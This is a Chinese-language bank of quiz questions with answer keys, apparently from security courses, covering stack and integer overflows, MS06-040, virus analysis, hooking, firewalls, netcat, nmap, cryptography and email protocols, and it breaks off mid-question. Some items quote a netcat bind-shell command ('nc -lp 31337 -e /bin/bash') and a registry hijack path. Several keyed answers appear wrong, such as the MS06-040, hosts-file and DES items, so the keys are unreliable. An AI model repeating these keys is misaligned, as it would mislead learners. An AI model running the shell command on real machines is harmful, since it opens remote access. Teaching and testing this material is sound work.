1、这样当CALL执行完后,程序再将该地址出栈,这样就能够知道下一步应该执行哪条指令,该地址称为?

A、 请求地址

B、 返回地址

C、 重复地址

D、 目标地址

您的答案: 标准答案: B

2、关于编写MessageBox()的调用过程中,下列说法错误的是?

A、 MessageBox()这个函数编写过程中,需要包含4个参数

B、 MessageBox()这个函数这个ApI函数包含有四个参数,其中可以给第一和第四个参数赋给0值

C、 编写该函数的调用过程中需要将两个参数中包含的字符串转换为十六进制

D、 编写该函数的调用过程中需要将两个参数中包含的字符串转换为ASCII码

您的答案: 标准答案: C

3、下列说法错误的是?

A、 MessageBoxA这个函数,它位于user32.dll

B、 所有的Win32程序都会自动加载kernel32.dll

C、 为了正常退出程序,还需要使用ExitProcess

D、 为了显示对话框,需要ExitProcess使用这个函数

您的答案: 标准答案: D

4、0x0012FFFF为系统默认的栈的底端

A、 对

B、 错

您的答案: 标准答案: A

5、关于W32Dasm的说法正确的是?

A、 W32Dasm是一款逆向分析软件,是一款比IDA Pro更为流行的软件

B、 W32Dasm是一款逆向分析软件,被誉为破解界的“屠龙刀”

C、 W32Dasm是一款逆向分析软件,因此其本身是不存在任何漏洞的

D、 W32Dasm这款逆向分析工具,但不是一个静态反汇编工具。

您的答案: 标准答案: B

6、MS06-040漏洞指的是?

A、 远程代码执行漏洞

B、 NetpwPathCanonicalize()函数存在着缓冲区溢出的缺陷

C、 心脏滴血漏洞

D、 远程桌面执行漏洞

您的答案: 标准答案: D

7、课程中的程序对字符串的长度限定是unicode的0x411个字符,也就是多少个字节?

A、 0x822

B、 0x823

C、 0x722

D、 2的36次方

您的答案: 标准答案: A

8、text:7517FC92 cmp esi, ebx 该代码表示的意思是 验证参数Source的长度是否大于0x411。

A、 对

B、 错

您的答案: 标准答案: A

9、(课程中,删掉)ecx中保存的是哪的地址?

A、 缓冲区结束位置的地址

B、 缓冲区中间位置的地址

C、 缓冲区起始位置的地址

D、 没有任何地址

您的答案: 标准答案: C

10、函数CanonicalizePathName()是不能够被直接调用的。

A、 对

B、 错

您的答案: 标准答案: A

11、Winamp是一款什么软件?

A、 Winamp是一款用于研究栈溢出的软件

B、 Winamp是一款音乐播放软件

C、 Winamp是一款视频播放软件

D、 Winamp是一款用于研究代码漏洞的软件

您的答案: 标准答案: B

12、whatsnew.txt文件位于Winamp文件夹中,保存内容是

A、 软件的更新历史信息

B、 软件的日志信息

C、 软件的备忘信息

D、 软件的回收信息

您的答案: 标准答案: A

13、视频中程序程序使用的是call esp的方法,那么esp所保存的地址是?

A、 0x00BDEDF0

B、 0x00BDEDE0

C、 0x00BDEDE4

D、 0x00BDEDE8

您的答案: 标准答案: D

14、以下哪种情况会造成整数溢出?

A、 inputTest:65535 ,outputTest:65535

B、 inputTest:65539,outputTest:65539

C、 inputTest:65536,outputTest:1

D、 inputTest:65537,outputTest:1

您的答案: 标准答案: D

15、32位的无符号整数可以表示的整数范围是:0-2的16次方-1。

A、 对

B、 错

您的答案: 标准答案: B

16、下列说法错误的是?

A、 无符号整数的下溢和上溢过程会触发安全性

B、 符号问题会触发安全性

C、 在高位数的整数复制到低位数的整数的时候会触发安全性

D、 整数在内存里面保存在一个固定长度的空间内,它能存储的最大值就是不固定

您的答案: 标准答案: D

17、函数sub_40366F一共有几个局部变量,几个参数?

A、 7,0

B、 7,4

C、 7,9

D、 4,7

您的答案: 标准答案: B

18、当代码接下来执行到0x004017BC的位置,会发现改代码的功能是?

A、 循环

B、 覆盖

C、 赋值

D、 清除

您的答案: 标准答案: A

19、krnln.fnr这个文件是加了壳,通过什么定律可以进行脱壳?

A、 ESP定律

B、 CALL定律

C、 main定律

D、 0x02定律

您的答案: 标准答案: A

20、 API函数都保存在操作系统提供的什么文件中?

A、 esp

B、 dat

C、 DLL

D、 exe

您的答案: 标准答案: C

21、在操作系统中安装全局钩子以后,只要目标进程符合我们所设定的条件,全局钩子的DLL文件会被操作系统自动或强行地加载到该进程中。

A、 对

B、 错

您的答案: 标准答案: A

22、“开启监控”按钮的功能是首先需要获取欲注入的DLL程序的完整路径,也就是当前目录。

A、 对

B、 错

您的答案: 标准答案: A

23、关闭监控”按钮的功能是查找explorer.exe进程中是否含有我们所注入的什么文件?

A、 kernel32.dll

B、 CreateProcessHook.dll

C、 HookCreateProcess.dll

D、 LoadLibraryA.dll

您的答案: 标准答案: C

24、因为程序使用了getcwd()函数获取当前路径,所以需要添加头文件direct.h,而为了实现进程的遍历,但不需要包含头文件Tlhelp32.h。

A、 对

B、 错

您的答案: 标准答案: B

25、CRC32查杀方式比传统的查杀方式的查杀效率高一些。

A、 对

B、 错

您的答案: 标准答案: B

26、熊猫病毒特征码的字节是多少个字节?

A、 32

B、 33

C、 16

D、 24

您的答案: 标准答案: A

27、U盘病毒的文件偏移是?

A、 0x192

B、 x1920

C、 0x1920

D、 0x190

您的答案: 标准答案: C

28、如果计算机已经中了病毒,现在我们拥有了该病毒的特征码,那么我们能否修复该病毒给计算机造成的危害。

A、 对

B、 错

您的答案: 标准答案: B

29、有些病毒为了实现网站劫持,使其重定向到自己指定的地址,那么为了达到这一目的,通常做法是Windows系统里位于%SystemRoot%\system32\drivers目录下的hosts文件。

A、 对

B、 错

您的答案: 标准答案: B

30、无论程序是用C#,还是C++,或是VB编写,最终都被编译为.NET的中间语言IL。

A、 对

B、 错

您的答案: 标准答案: A

31、计算机病毒的会造成哪些危害?

A、 磁盘破坏

B、 计算机用户的伤害

C、 CPU的损坏

D、 程序和数据的破坏

您的答案: 标准答案: D

32、在Windows 32 位操作系统中,其EXE文件中的特殊表示为?

A、 MZ

B、 PE

C、 NE

D、 LE

您的答案: 标准答案: B

33、能够感染EXE、COM 文件的病毒属于?

A、 网络型病毒

B、 蠕虫型病毒

C、 文件型病毒

D、 系统引导型病毒

您的答案: 标准答案: C

34、下列描述不正确的是?

A、 不存在能够防治未来的所有病毒的发病毒软、硬件

B、 现在的杀毒软件能够查杀未知病毒

C、 病毒产生在前,反病毒手段相对滞后

D、 数据备份是防治数据丢失的重要手段

您的答案: 标准答案: B

35、下列预防计算机病毒的注意事项中,错误的是?

A、 不使用网络,以免中毒

B、 重要资料经常备份

C、 备好启动盘

D、 尽量避免在无防毒软件机器上使用可移动储存介质

您的答案: 标准答案: A

36、什么是敲竹杠病毒?

A、 对电脑设置开机密码类,再提供密码索要费用的木马病毒

B、 盗取数据信息的病毒

C、 破坏计算机运行的病毒

D、 伪装监控病毒

您的答案: 标准答案: A

37、在OD工具调试中,JE跳转不成立,不改变病毒运行顺序的情况下,可以把ZF标志位修改为1。

A、 对

B、 错

您的答案: 标准答案: A

38、EAX寄存器保存的是操作字符串的地址信息。

A、 对

B、 错

您的答案: 标准答案: A

39、病毒屏蔽杀毒软件后可以用改文件名的方法来进行绕过。

A、 对

B、 错

您的答案: 标准答案: A

40、注册表映像劫持的路径是?

A、 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

B、 HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run

C、 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\

D、 HKCU\Software\Microsoft\Windows\CurrentVersion\Run

您的答案: 标准答案: C

41、CreateToolhelp32Snapshot函数解析正确的是?

A、 检索系统快照中遇到的第一个进程的信息

B、 搜索一个文件或子目录名匹配一个特定名称的目录

C、 获取进程信息为指定的进程、进程使用的堆、线程建立一个快照

D、 函数终止指定进程及其所有线程

您的答案: 标准答案: C

42、每个函数都有自己的栈帧,每个函数都是利用自己的栈帧空间保存全局变量与函数的调用关系。()

A、 对

B、 错

您的答案: 标准答案: B

43、如果能控制进程的执行流程,不能够执行想要执行的指令,达到我们目的的指令序列就叫做shellcode。()

A、 对

B、 错

您的答案: 标准答案: B

44、下面是漏洞代码,分析的结果:创建一个ba数组,将ba内容加密,修改ba内容,为ba解密。()

A、 对

B、 错

您的答案: 标准答案: B

45、缓冲区溢出漏洞的原理,它就是因为我们输入了过长的字符,而缓冲区本身又没有有效的验证机制,导致过长的字符将返回地址覆盖掉了

A、 对

B、 错

您的答案: 标准答案: A

46、0x0012FFFF为系统默认的栈的底端

A、 对

B、 错

您的答案: 标准答案: A

47、text:7517FC92 cmp esi, ebx 该代码表示的意思是 验证参数Source的长度是否大于0x411。

A、 对

B、 错

您的答案: 标准答案: A

48、函数CanonicalizePathName()是不能够被直接调用的。

A、 对

B、 错

您的答案: 标准答案: A

49、32位的无符号整数可以表示的整数范围是:0-2的16次方-1。

A、 对

B、 错

您的答案: 标准答案: B

50、在操作系统中安装全局钩子以后,只要目标进程符合我们所设定的条件,全局钩子的DLL文件会被操作系统自动或强行地加载到该进程中。

A、 对

B、 错

您的答案: 标准答案: A

1、下列哪项不是信息安全的定义?

A、 数据安全,确保数据不会被非法入侵者读取或破坏

B、 程序安全,重视软件开发过程的品质及维护

C、 系统安全,维护计算机系统正常操作

D、 环境安全,管理员不能用弱口令

您的答案: 标准答案: D

2、下列哪项不是正确的防止被骗操作?

A、 在淘宝购买东西应该使用旺旺交流

B、 商家发送的发票文件,直接打开

C、 商品多次修改价格,应该提高警惕

D、 对商家发送的文件进行查杀

您的答案: 标准答案: B

3、下列选项中对DES加密算法描述不正确的是?

A、 以64位为分组对数据进行加密

B、 其密钥长度为56位

C、 运用相同算法进行加密解密

D、 DES加密算法为最安全的加密算法之一

您的答案: 标准答案: D

4、下列关于标准防火墙的描述错误的是?

A、 防火墙安全规则遵循从上到下匹配原则,一旦有一条匹配,剩余的规则就不匹配了

B、 所有的规则都没有匹配到,数据包将丢弃

C、 安全过滤规则主要包含源、目的地址和端口

D、 防火墙的主要功能是防止病毒等恶意程序的传输

您的答案: 标准答案: D

5、对于“access-list 101 primit tcp any host 198.78.46.8 eq www”的acl规则理解正确的是?

A、 匹配顺序为101,允许ip为198.78.46.8的主机访问任何外部ip

B、 规则强度为101,不允许TCP连接,禁止所有主机对198.78.46.8的www服务进行访问

C、 匹配顺序为101,允许TCP连接,所有主机对198.78.46.8的www服务进行访问

D、 匹配顺序为101,允许TCP连接,禁止禁止所有主机对198.78.46.8的www服务进行访问

您的答案: 标准答案: C

6、下列那些SMTP命令是用来发送邮件的Envelop的?

A、 HELO xxx.com

B、 MAIL FROM :<>和RCPT TO:<>

C、 DATA

D、 AUTH LOGIN

您的答案: 标准答案: B

7、下列关于信息安全保障的描述错误的是?

A、 信息安全保障的是核心业务,信息安全保障是为了支撑业务的正常运行

B、 信息系统安全的保障是在整个信息系统的生命周期中

C、 要确保信息系统的保密性、完整性、和可用性

D、 信息安全保障策略的制定没办法考虑到地震、海啸等大自然的不可抗力

您的答案: 标准答案: D

8、下列对于下一代防火墙的描述错误的是?

A、 将访问控制对象从网络层、传输层延伸到应用层

B、 下一代防火墙能够识别应用和内容

C、 下一代防火墙可以限制用户是否能在上班时间访问娱乐社交软件

D、 下一代防火墙已经丢弃了传统防火墙的工作模式

您的答案: 标准答案: D

9、下列关于KDC的描述错误的是?

A、 KDC是秘钥分发中心

B、 网络中所有客户机和服务器都信任KDC,并使用KDC验证用户身份

C、 KDC是由认证服务和票据授予服务组成

D、 认证服务的作用主要是生成两个主题之间通信的票据

您的答案: 标准答案: D

10、下列哪项不是防火墙常见的工作方式?

A、 包过滤

B、 状态监测

C、 透明接入

D、 应用代理

您的答案: 标准答案: C

11、下列选项中关于ACL规则的匹配原则描述不正确的是?

A、 防火墙安全规则遵循从上到下匹配的原则

B、 如果所有的规则都没有匹配到,数据包将被丢弃

C、 安全过滤规则只包含源、目的地址和端口

D、 防火墙安全规则匹配时一旦有一条匹配,剩余的都不再进行匹配

您的答案: 标准答案: C

12、下列选项中关于防火墙的透明部署方式描述错误的是?

A、 内外网在一个网段内

B、 优点是直接串联到链路上,不改变原有的网络IP地址配置

C、 缺点是像玻璃一样,屋内屋外一览无余

D、 透明模式即用户可以访问到网络安全设备

您的答案: 标准答案: D

13、下列关于nc -lp 31337 -e /bin/bash 的理解错误的是____。

A、 打开并监听本地端口31337,等待主机连接

B、 -e 代表将/bin/bash 绑定在此端口上

C、 这是使用netcat反弹shell的命令

D、 使用的是反向连接方式反弹shell

您的答案: 标准答案: D

14、下列选项中最复杂的密码是____。

A、 博福特密码

B、 弗纳姆密码

C、 滚动密钥密码

D、 转轮密码

您的答案: 标准答案: D

15、下列关于Netcat的操作的描述错误的是____。

A、 nc -G 追踪连接可用于网络排查

B、 -o 会将显示的内容输出到一个指定文件

C、 -h 打开nc的帮助文档

D、 -l 表示打ip列表

您的答案: 标准答案: D

16、下列关于nc -lp 31337 -e /bin/bash 的理解错误的是____。

A、 打开并监听本地端口31337,等待主机连接

B、 -e 代表将/bin/bash 绑定在此端口上

C、 这是使用netcat反弹shell的命令

D、 使用的是反向连接方式反弹shell

您的答案: 标准答案: D

17、下列哪些功能不是netcat能做到的?

A、 在两台主机之间通信

B、 在两台主机之间传输文件

C、 反弹主机shell

D、 漏洞扫描以及利用

您的答案: 标准答案: D

18、下面对于"nc www.google.com 80"的描述错误的是?

A、 连接google.com 开放的80端口

B、 可以获取一些关于主机的信息

C、 可以发送http请求包来访问网站

D、 不会连接成功

您的答案: 标准答案: D

19、使用____命令检测目标主机的端口开放情况。

A、 nmap --version

B、 nmap

C、 nmap -A -v

D、 nmap -sP 192.168.0.0/24

您的答案: 标准答案: B

20、下列对于“nmap 10.73.31.0/24 --exclude 10.73.31.184”的理解错误的是____。

A、 nmap 10.73.31.0/24 是指扫描该IP的整个C段网络

B、 nmap 10.73.31.0/24 等于 nmap 10.73.31.*

C、 --exclude 10.73.31.184 是指 在扫描整个C段网络时 排除10.73.31.184这个IP

D、 扫描结果会包含主机操作系统信息

您的答案: 标准答案: D

21、只进行主机存活探测,使用____命令。

A、 nmap --version

B、 nmap

C、 nmap -A -v

D、 nmap -sP 192.168.0.0/24

您的答案: 标准答案: D

22、密码术中永恒的两大原则是____。

A、 替换 换位

B、 混乱 换位

C、 混乱 扩散

D、 扩散 替换

您的答案: 标准答案: A

23、下列关于DES算法描述不正确的是____。

A、 密钥较短

B、 加解密速度快

C、 适用于加密大量数据的场合

D、 加解密的密钥相同

您的答案: 标准答案: D

24、下列选项中不属于密码对信息的保护的是____。

A、 信息的传输

B、 信息的存储

C、 信息的交换

D、 信息的发布

您的答案: 标准答案: D

25、下列____不属于单钥体制的密码系统。

A、 代数作业体制

B、 序列密码体制

C、 堆成密码体制

D、 分组密码体制

您的答案: 标准答案: C

26、____表示邮件服务器返回代码为临时性失败(xx代表任意数)。

A、 2xx

B、 3xx

C、 4xx

D、 5xx

您的答案: 标准答案: C

27、买家称购买商品异常后的正确操作是立即咨询官方客服。

A、 正确

B、 错误

您的答案: 标准答案: A

28、网上陌生人给你发送补丁文件正确的操作是不下载文件。

A、 错误

B、 正确

您的答案: 标准答案: B

29、下列对于白帽、黑帽和灰帽黑客描述错误的是____。

A、 白帽黑客帮助企业进行安全测试

B、 黑帽黑客是自己对网站进行攻击

C、 灰帽黑客是不会恶意的使用漏洞进行攻击

D、 黑客所有的一切操作都是违法的

您的答案: 标准答案: D

30、白帽黑客正确的的行为是不可以传播、共享数据。

A、 错误

B、 正确

您的答案: 标准答案: B

31、用于电子邮件传输网络标准的协议是

A、 SMTP

B、 PPTP

C、 MLTP

您的答案: 标准答案: A

32、能支持非ASCII码字符文本格式的标准是

A、 SMTP

B、 MIME

C、 JSON

您的答案: 标准答案: B

33、1995年推出了新ESMTP的RFC号是

A、 RFC5321

B、 RFC1869

C、 RFC821

您的答案: 标准答案: B

34、SMTP只支持7位ASCII码,且不能传输二进制文件

A、 对

B、 错

您的答案: 标准答案: A

35、第一次是谁提出现代密码学编码原则的

A、 1884年Kerchoffs提出加密规则

B、 1883年Kerchoffs提出编码原则

C、 1884年Kerchoffs提出编码算法

D、 1883年Kerchoffs提出规则加密

您的答案: 标准答案: B

36、目前流行的加密算法有DES,AES,RSA,MD5,SHA1?

A、 对

B、 错

您的答案: 标准答案: A

37、常见非对称式算法有?

A、 DES,3DES,ASE

B、 ASE,RSA,ECC,MD5,SHA,DSA

C、 DES,AES,RSA,MD5,SHA1

D、 RSA,DSA,ECC

您的答案: 标准答案: D

38、DES的加密长度是多少位?

A、 128位

B、 112或者128位

C、 128、192、256位

D、 56位

您的答案: 标准答案: D

39、物理生活中密码泄露通常是什方式泄露

A、 网络上面使用弱口令被通过碰撞方式泄露

B、 公共场合免费WIFI等

C、 钓鱼网站

D、 以上全对

您的答案: 标准答案: B

40、使用什么协议浏览网页更加安全

A、 ftp

B、 http

C、 https

D、 tcp/ip

您的答案: 标准答案: C

41、使用最正确的方式防范个人信息安全的是?

A、 在网络中使用多个复杂密码提高自身密码安全性防止服务商泄露

B、 在网络中使用多个复杂密码提高自身密码安全性

C、 使用notepad记录常用密码放到电脑

D、 使用复杂密码定期修改,选择可靠平台,不主动透露个人信息

您的答案: 标准答案: D

42、及时发现项目BUG进行日志监控,哪些操作最合理正确?

A、 查看服务器配置的WEB日志进行监控

B、 使用安全防护软件进行日志扫描

C、 能在用户发生错误的那一刻,通过日志发现那些黑客在攻击我们

D、 使用常见的日志检查工具,配合debug模式进行测试查看是否控制严格

您的答案: 标准答案: D

43、如何做好日常防护防范

A、 不信任客户端提交过来的任何数据

B、 不接受客户端提交过来的任何数据

C、 客户端提交过来的数据严格检查,做好规则

D、 不理客户端提交过来的数据该怎么提交就怎么提交

您的答案: 标准答案: C

44、网络中使用防火墙起到什么作用?

A、 防止电脑报错

B、 防止流量异常

C、 防止黑客

D、 保护内部敏感信息资源,防止内部泄露

您的答案: 标准答案: D

45、网络传输五元组以下那个正确?

A、 目的端口,源端口,应用层,传输层,物理层

B、 原Mac,目的MAC,数据链路层,网络层,会话层

C、 目的IP,原IP,协议号,目的端口,原端口,会话层

D、 目的IP,原IP,协议号,目的端口,原端口

您的答案: 标准答案: D

46、防火墙访问控制列表"允许任何流量通过"规则

A、 access-list 1 deny 172.16.4.13 0.0.0.0

B、 access-list 2 permit 172.16.0.0 0.0.255.255

C、 access-list 3 permit 0.0.0.0 255.255.255.255

D、 access-list 3 permit 0.0.0.0 255.0.0.255

您的答案: 标准答案: C

47、透明模式和桥模式说法正确的有?

A、 内外网在一个网段内

B、 有点是直接串联到链路上,不改变原有的网络IP地址

C、 缺点是像玻璃一样,屋内屋外一览无余

D、 以上全对

您的答案: 标准答案: D

48、虚拟化主机安全?

A、 云存储安全,云存储杀毒,访问控制,源数据备份

B、 vVirus,vFw,vSwitch,vIDS,运维审计,安全加固

C、 云安全管理平台,SDN+VxLan,安全域划分,网络边界防护,运维审计

D、 温、温度,接地,防静电,消防

您的答案: 标准答案: B

49、什么技术可以伪造任意电话号码?

A、 钓鱼电话

B、 冒充电话

C、 伪基站技术

D、 网络电话

您的答案: 标准答案: C

50、劫持到其他网页和游戏广告是从那个入口被劫持的

A、 链接网络

B、 网络接口

C、 路由器

D、 电脑

您的答案: 标准答案: C

1、路由器有哪几种加密方式

A、 WEP,WEPA-PSD,WPA2-PSK,WPA-PSK+WPA2-PSK

B、 WEP,WEPA-PSA,WPA2-PSK,WPA-PSK

C、 WEP,WEPA-PSS,WPA2-PSK,WPA-PSK+WPA2-PSK

D、 WEP,WEPA-PSK,WPA2-PSK,WPA-PSK+WPA2-PSK

您的答案: 标准答案: D

2、黑客劫持DNS会出现那些状况

A、 网络浏览网页变快

B、 网络浏览网页速度明显变慢

C、 网络加速

D、 网络浏览网页更加安全

您的答案: 标准答案: B

3、网购诈骗流程操作?

A、 交易失败-虚假客户-误导提示-钓鱼链接-网银授权操作

B、 交易失败-虚假客户-误导提示-网银授权操作-洗劫卖家网银账号

C、 交易失败-误导提示-钓鱼链接-网银授权操作-洗劫卖家网银账号

D、 交易失败-虚假客户-误导提示-钓鱼链接-网银授权操作-洗劫卖家网银账号

您的答案: 标准答案: D

4、邮件收发环境包括()来完全组合:

A、 防火墙,DMZ隔离区,网络中间节点

B、 邮件服务器,邮件客户端

C、 数据库,Appliance,云端

D、 防火墙,DMZ隔离区,Appliance,网络中间节点,邮件服务器,邮件客户端,数据库,云端

您的答案: 标准答案: D

5、邮件投递过程中顺序正确的是():

A、 MUA编辑邮件,MSA编辑完发送,MTA邮件传输,MDA邮件投递

B、 MSA编辑完发送,MDA邮件投递

C、 邮件用户代理,邮件递交代理,邮件投递代理,邮件传输代理

D、 编辑邮件,MTA邮件传输,邮件递交代理,邮件投递代理

您的答案: 标准答案: A

6、利用 DNS查找目的地址,记录说明错误的是():

A、 A记录:主机到IP地址的映射

B、 CNAME记录:查找主机别名

C、 MX记录:Domain到MTA的映射

D、 CNAME记录:查找IP别名

您的答案: 标准答案: D

7、DNS记录类型说明错误的是():

A、 CNAME:别名到域名的映射

B、 PTR:正向DNS解析

C、 MX:实现主机名到接收邮件的主机名映射

D、 SPE:Mail Client简单的认证方式

您的答案: 标准答案: B

8、使用nslookup命令查询网址的MX记录,preference数字越小代表优先级低,越大优先级越高。()

A、 对

B、 错

您的答案: 标准答案: B

9、论文《计算机安全威胁监控与监视》提出的监视入侵活动的思路是

A、 利用日志作为审计数据监视入侵活动

B、 利用流量作为审计数据监视入侵活动

C、 利用恶意代码作为审计数据监视入侵活动

您的答案: 标准答案: A

10、IDS设备部署的关键是

A、 关键是查杀恶意代码

B、 关键是设备的正确配置

C、 关键是阻断攻击流量

D、 关键是日常安全事件的跟踪与处理

您的答案: 标准答案: D

11、入侵检测系统可以检测存在的恶意代码

A、 对

B、 错

您的答案: 标准答案: B

12、沙箱是通过哪种方式检测入侵

A、 逆向分析

B、 虚假目标

C、 行为表现

D、 流量检测

您的答案: 标准答案: C

13、把IDS串联在保护目标前就成了IPS

A、 对

B、 错

您的答案: 标准答案: B

14、攻击者利用中间人技术监听网络数据流量是破坏了信息安全三要素的哪一点?()

A、 保密性

B、 完整性

C、 可用性

D、 抗抵赖性

您的答案: 标准答案: A

15、Web服务器遭到ddos攻击,Web服务中断是破坏了信息安全三要素的哪一点?()

A、 保密性

B、 完整性

C、 可用性

D、 抗抵赖性

您的答案: 标准答案: C

16、安全保障需求的原因是价值风险。

A、 对

B、 错

您的答案: 标准答案: A

17、我国信息安全的标准是等级保护。

A、 对

B、 错

您的答案: 标准答案: A

18、密钥的传递方法有哪些?

A、 物理传递

B、 旧密钥加密新密钥

C、 加密链路

D、 对称加密

您的答案: 标准答案: D

19、UNIX文件的访问控制不包含下面哪一项?

A、 属主

B、 组成员

C、 root

D、 其他

您的答案: 标准答案: C

20、DoD(美国国防部)使用的四层分级制和权限空间不包含哪一项?

A、 绝密级

B、 隐私级

C、 秘密级

D、 机密级

您的答案: 标准答案: B

21、BLP模型中的“不上读,不下写”保证了数据的什么特性?

A、 安全性

B、 可用性

C、 完整性

D、 保密性

您的答案: 标准答案: D

22、TCP数据包报文中哪个字段不可以被利用来构成隐蔽通道?

A、 序号

B、 确认号

C、 保留字段

D、 数据迁移值

您的答案: 标准答案: D

23、下面那个保存密码的方式是最推荐的?

A、 脑记

B、 便签贴

C、 密码工具

D、 云笔记

您的答案: 标准答案: C

24、Google的GOTP采用哪一种方式做计数器?

A、 时间

B、 账号

C、 IP

D、 GPS

您的答案: 标准答案: A

25、HTTPS比HTTP安全,并且不会被截取到数据

A、 对

B、 错

您的答案: 标准答案: B

26、下列对称算法,哪个相对更安全?

A、 DES

B、 AES

C、 3DES

您的答案: 标准答案: B

27、1883年Kerchoffs 提出了编码的原则,是现代密码学与古密码的分界线

A、 对

B、 错

您的答案: 标准答案: A

28、下面关于OpenSSL心脏出血漏洞说法错误的是?

A、 OpenSSL默认端口443

B、 每次能获取到64Kb大小的信息

C、 没有任何危害

您的答案: 标准答案: C

29、网络全就是web安全。

A、 对

B、 错

您的答案: 标准答案: B

30、Des加密算法属于对称加密算法。

A、 对

B、 错

您的答案: 标准答案: A

31、下面不属于对称加密算法的是?

A、 DES

B、 AES

C、 hash

您的答案: 标准答案: C

32、数字签名能够伪造。

A、 对

B、 错

您的答案: 标准答案: B

33、Telnet协议是TCP/IP协议族中的一员,是Internet远程登陆服务的标准协议和主要方式。传输过程中是明文传输的。

A、 对

B、 错

您的答案: 标准答案: A

34、Cookie可进行简单的web用户状态认证。

A、 对

B、 错

您的答案: 标准答案: A

35、ORA可以协助证书作废过程。

A、 对

B、 错

您的答案: 标准答案: A

36、密码学的目的是?

A、 研究数据加密

B、 研究数据解密

C、 研究信息安全

D、 研究数据保密

您的答案: 标准答案: C

37、一个完整的密码体制,不包括以下( )要素。

A、 明文空间

B、 密文空间

C、 数字签名

D、 密钥空间

您的答案: 标准答案: C

38、以下关于等级保护的说法中不正确的是( )。

A、 是国家信息安全保障工作的基本制度、基本国策

B、 是开展信息安全工作的基本方法

C、 是提高国家综合竞争力的主要手段

D、 是促进信息化、维护国家信息安全的根本保障

您的答案: 标准答案: C

39、以下关于等级保护的说法中不正确的是:( )

A、 信息安全等级保护是对信息和信息载体按照重要性等级分级别进行保护的一种工作

B、 在中国、美国等很多国家都存在的一种信息安全领域的工作

C、 广义上为涉及到该工作的标准、产品、系统、信息等均依据等级保护思想的安全工作

D、 信息系统的等级保护工作不具有分级别保护的区别,可以统一进行防护

您的答案: 标准答案: D

40、以下关于等级保护工作说法不正确的是:( )

A、 信息安全等级保护工作主要是由使用方来进行,无需其他厂商、主管部门的参与

B、 等级保护是涉及技术与管理两个领域的复杂系统工程

C、 对于不同的信息系统划分不同的安全等级,提出逐级增强的安全指标基本要求

D、 信息安全等级保护建设的主要内容,就是要从“机密性、完整性以及可用性”的角度,客观评价保护对象(信息系统)的重要性

您的答案: 标准答案: A

41、访问网址www.1cbc.com.cn,将可能遭受( )攻击?

A、 缓冲区溢出攻击

B、 钓鱼攻击

C、 SQL注入攻击

D、 拒绝服务攻击

您的答案: 标准答案: B

42、钓鱼攻击具有下列选项中除了( )以外的所有特点。

A、 欺骗性Web链接

B、 真实的发送方地址

C、 一般性的问候

D、 要求采取行动的紧急请求

您的答案: 标准答案: B

43、下列对XSS攻击(跨站脚本攻击)描述正确的是( )

A、 XSS攻击指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。

B、 XSS攻击是DDOS攻击的一种变种。

C、 XSS攻击就是CC攻击。

D、 XSS攻击就是利用被控制的机器不断地向被攻击网站发送访问请求,迫使IIS 连接数超出限制,当CPU 资源或者带宽资源耗尽,那么网站也就被攻击垮了,从而达到攻击目的。

您的答案: 标准答案: A

44、黑客利用IP地址进行攻击的方法有( )。

A、 欺骗

B、 解密

C、 窃取口令

D、 发送病毒

您的答案: 标准答案: A

45、下列对XSS攻击(跨站脚本攻击)描述正确的是( )。

A、 XSS攻击指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中的html代码会被执行,从而达到恶意攻击用户的特殊目的

B、 XSS攻击是DDOS攻击的一种变种

C、 XSS攻击就是CC攻击

D、 XSS攻击就是利用被控制的机器不断地向被攻击网站发送访问请求,迫使IIS 连接数超出限制,当CPU 资源或者带宽资源耗尽,那么网站也就被攻击垮了,从而达到攻击目的

您的答案: 标准答案: A

46、下列网络攻击者称谓中,( )的技术含量通常最低。

A、 黑客

B、 脚本小子

C、 间谍

D、 网络恐怖分子

您的答案: 标准答案: B

47、秘密地将自己添加到文档或程序等宿主上,当文档被打开或程序被执行时执行的程序,称作( )。

A、 病毒

B、 蠕虫

C、 Rootkit

D、 木马

您的答案: 标准答案: A

48、病毒可以通过下列选项中除( )以外的方式从一台计算机传播到另一台计算机。

A、 作为电子邮件的被感染文件

B、 优盘上的被感染文件

C、 从互联网上下载的被感染文件

D、 重启计算机

您的答案: 标准答案: D

49、计算机病毒有很多种类型,但不包括( )。

A、 文件感染类病毒

B、 远程病毒

C、 内存驻留病毒

D、 引导区病毒

您的答案: 标准答案: B

50、 黑客要想控制某些用户,需要把木马程序安装到用户的机器中,实际上安装的是( )。

A、 木马的控制端程序

B、 木马的服务端程序

C、 不用安装

D、 控制端、服务端程序都必需安装

您的答案: 标准答案: B

1、防间谍软件要求下列选项中除( )以外的所有特性。

A、 定期更新以防止最新间谍软件攻击

B、 能提供连续性监控并能够完全扫描整个计算机

C、 能够显示威胁处理推荐动作的详细信息

D、 只有商业软件可用,需要按年付费

您的答案: 标准答案: D

2、 在TCP/IP参考模型中,应用层是最高的一层,它包括了所有的高层协议。下列协议中不属于应用层协议的是( )

A、 HTTP

B、 FTP

C、 UDP

D、 SMTP

您的答案: 标准答案: C

3、下列方法中,识别Email来源真实性最可靠的是( )。

A、 查看发件服务器地址

B、 查看发件人名称

C、 查看发件人地址

D、 查看回信地址

您的答案: 标准答案: A

4、下列选项中,除了( )以外都是杀毒软件发现病毒时的可选项。

A、 清除文件中的病毒

B、 隔离被感染文件

C、 发送邮件告诉攻击者病毒已暴露

D、 删除包含病毒的文件

您的答案: 标准答案: C

5、( )是一个预先定义的电子邮件地址列表,用户可以接收来自该列表中地址的邮件。

A、 僵尸网络

B、 黑名单blacklist

C、 白名单whitelist

D、 干净列表

您的答案: 标准答案: C

6、密码学包括密码编码学和密码解码学。( )

A、 对

B、 错

您的答案: 标准答案: B

7、可以通过配置( )来防止用户通过多次登录尝试来猜测其他人的密码

A、 密码策略

B、 账户锁定策略

C、 Kerberos策略

D、 审计策略

您的答案: 标准答案: B

8、Ping命令使用ICMP的哪一种Code类型( )。

A、 Redirect

B、 Echo reply

C、 Source quench

D、 Destination Unreachable

您的答案: 标准答案: B

9、在Linux系统中,修改口令策略和查看某个用户的口令策略分别是对如下哪两个文件进行操作( )。

A、 /etc/login.defs和/etc/shadow

B、 /etc/login.defs和/etc/passwd

C、 /etc/passwd和/etc/shadow

